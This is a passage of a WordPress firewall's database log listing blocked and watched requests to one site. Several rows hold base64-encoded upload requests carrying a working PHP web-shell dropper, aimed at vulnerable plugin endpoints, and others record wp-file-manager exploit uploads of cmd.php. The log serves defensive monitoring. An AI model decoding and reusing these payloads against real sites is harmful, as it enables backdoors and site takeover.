(Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tcG9zdC5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggaTY4NjsgcnY6MjguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8yOC4wCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9MWJiNGU0YTUyZWMxMmUyMmZhNGE0Mjk5ODhhMDFlOTkKQ29udGVudC1MZW5ndGg6IDE2NjkKCi0tMWJiNGU0YTUyZWMxMmUyMmZhNGE0Mjk5ODhhMDFlOTkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJwYWdlIgoKcGFnZWxpbmVzCi0tMWJiNGU0YTUyZWMxMmUyMmZhNGE0Mjk5ODhhMDFlOTkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzZXR0aW5nc191cGxvYWQiCgpzZXR0aW5ncwotLTFiYjRlNGE1MmVjMTJlMjJmYTRhNDI5OTg4YTAxZTk5CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCIKQ29udGVudC1UeXBlOiAKRXhwaXJlczogMAoKPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokcyA9ICc8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPjw\\/cGhwIGVjaG8gXCc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj5cJztlY2hvIFwnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPlwnO2lmKCAkX1BPU1RbIl91cGwiXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSkgeyBlY2hvICI8Yj5TaGVsbCBVcGxvYWRlZCAhIDopPGI+PGJyPjxicj4iOyB9ZWxzZSB7IGVjaG8gIjxiPk5vdCB1cGxvYWRlZCAhIDwvYj48YnI+PGJyPiI7IH19Pz4nOw0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCI7DQokdGV4dCA9ICRzOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3Z1bG4uaHRtIiA7DQokdGV4dDIgPSAnVnVsbiEhIHBhdGNoIGl0IE5vdyEnOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCgotLTFiYjRlNGE1MmVjMTJlMjJmYTRhNDI5OTg4YTAxZTk5LS0K\"}'),(175036,1602530523.452998,1602530522.243700,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/barclaycart/uploadify/uploadify.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL2JhcmNsYXljYXJ0L3VwbG9hZGlmeS91cGxvYWRpZnkucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTk0MjQxOGMzMmFmMzUwYzQwOGYzYzQzOGU1ZGJjYzUzCkNvbnRlbnQtTGVuZ3RoOiAxNTE2CgotLTk0MjQxOGMzMmFmMzUwYzQwOGYzYzQzOGU1ZGJjYzUzCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iRmlsZWRhdGEiOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YQpFeHBpcmVzOiAwCgo8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPg0KPD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRzID0gJzx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+PD9waHAgZWNobyBcJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPlwnO2VjaG8gXCc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+XCc7aWYoICRfUE9TVFsiX3VwbCJdID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwgJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0pKSB7IGVjaG8gIjxiPlNoZWxsIFVwbG9hZGVkICEgOik8Yj48YnI+PGJyPiI7IH1lbHNlIHsgZWNobyAiPGI+Tm90IHVwbG9hZGVkICEgPC9iPjxicj48YnI+IjsgfX0\\/Pic7DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIjsNCiR0ZXh0ID0gJHM7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9ICdWdWxuISEgcGF0Y2ggaXQgTm93ISc7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQo\\/Pg0KCi0tOTQyNDE4YzMyYWYzNTBjNDA4ZjNjNDM4ZTVkYmNjNTMtLQo=\"}'),(175037,1602530521.956167,1602530520.664800,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-admin/admin-ajax.php?action=getcountryuser&cs=2',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA\\/YWN0aW9uPWdldGNvdW50cnl1c2VyJmNzPTIgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggaTY4NjsgcnY6MjguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8yOC4wCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9NmM3ZmUxNzdjODRhMmNiMzM5NmM2NDNkNDE1MzQ4OGEKQ29udGVudC1MZW5ndGg6IDE0NzMKCi0tNmM3ZmUxNzdjODRhMmNiMzM5NmM2NDNkNDE1MzQ4OGEKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJwb3BpbWciOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogCkV4cGlyZXM6IDAKCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJHMgPSAnPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT48P3BocCBlY2hvIFwnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+XCc7ZWNobyBcJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT5cJztpZiggJF9QT1NUWyJfdXBsIl0gPT0gIlVwbG9hZCIgKSB7aWYoQGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpIHsgZWNobyAiPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+IjsgfWVsc2UgeyBlY2hvICI8Yj5Ob3QgdXBsb2FkZWQgISA8L2I+PGJyPjxicj4iOyB9fT8+JzsNCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWNvbnRlbnQvdnVsbi5waHAiOw0KJHRleHQgPSAkczsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gJ1Z1bG4hISBwYXRjaCBpdCBOb3chJzsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoKLS02YzdmZTE3N2M4NGEyY2IzMzk2YzY0M2Q0MTUzNDg4YS0tCg==\"}'),(175038,1602530562.944790,1602530561.930200,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tcG9zdC5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggaTY4NjsgcnY6MjguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8yOC4wCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9Nzc1ZDRlNjFkNGMyMWQ0ODY0MjU0YzNkODUxYjZkYzIKQ29udGVudC1MZW5ndGg6IDE2NjkKCi0tNzc1ZDRlNjFkNGMyMWQ0ODY0MjU0YzNkODUxYjZkYzIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJwYWdlIgoKcGFnZWxpbmVzCi0tNzc1ZDRlNjFkNGMyMWQ0ODY0MjU0YzNkODUxYjZkYzIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzZXR0aW5nc191cGxvYWQiCgpzZXR0aW5ncwotLTc3NWQ0ZTYxZDRjMjFkNDg2NDI1NGMzZDg1MWI2ZGMyCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCIKQ29udGVudC1UeXBlOiAKRXhwaXJlczogMAoKPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokcyA9ICc8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPjw\\/cGhwIGVjaG8gXCc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj5cJztlY2hvIFwnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPlwnO2lmKCAkX1BPU1RbIl91cGwiXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSkgeyBlY2hvICI8Yj5TaGVsbCBVcGxvYWRlZCAhIDopPGI+PGJyPjxicj4iOyB9ZWxzZSB7IGVjaG8gIjxiPk5vdCB1cGxvYWRlZCAhIDwvYj48YnI+PGJyPiI7IH19Pz4nOw0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCI7DQokdGV4dCA9ICRzOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3Z1bG4uaHRtIiA7DQokdGV4dDIgPSAnVnVsbiEhIHBhdGNoIGl0IE5vdyEnOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCgotLTc3NWQ0ZTYxZDRjMjFkNDg2NDI1NGMzZDg1MWI2ZGMyLS0K\"}'),(175039,1602885342.517424,1602885338.645700,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-log.php','http://ashbyresort.com/wp-log.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZy5waHA=\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1sb2cucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vYXNoYnlyZXNvcnQuY29tL3dwLWxvZy5waHAKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMAoK\"}'),(175040,1602885346.733125,1602885346.105300,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-log.php','http://ashbyresort.com/wp-log.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZy5waHA=\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1sb2cucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vYXNoYnlyZXNvcnQuY29tL3dwLWxvZy5waHAKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMApYLUh0dHBzOiAxCgo=\"}'),(175041,1603138672.561518,1603138669.959400,'\0\0\0\0\0\0\0\0\0\0 P',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Y21kLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuNQpDb25uZWN0aW9uOiBjbG9zZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2OjgwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvODAuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTQyNDc0ODkyODIyMTUwMTc4NDgzODM1NTI4MDc0CkNvbnRlbnQtTGVuZ3RoOiA3MzMKCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tNDI0NzQ4OTI4MjIxNTAxNzg0ODM4MzU1MjgwNzQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJyZXFpZCIKCjE3NDRmNzI5ODYxMWJhCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tNDI0NzQ4OTI4MjIxNTAxNzg0ODM4MzU1MjgwNzQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjbWQiCgp1cGxvYWQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS00MjQ3NDg5MjgyMjE1MDE3ODQ4MzgzNTUyODA3NApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InRhcmdldCIKCmwxX0x3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tNDI0NzQ4OTI4MjIxNTAxNzg0ODM4MzU1MjgwNzQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJtdGltZVswXSIKCjE1OTc4NTAzNzQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS00MjQ3NDg5MjgyMjE1MDE3ODQ4MzgzNTUyODA3NC0tCg==\"}'),(175042,1603162311.643158,1603162311.007700,'\0\0\0\0\0\0\0\0\0\0el`\"',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175043,1603162308.761477,1603162308.091100,'\0\0\0\0\0\0\0\0\0\0BL',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File 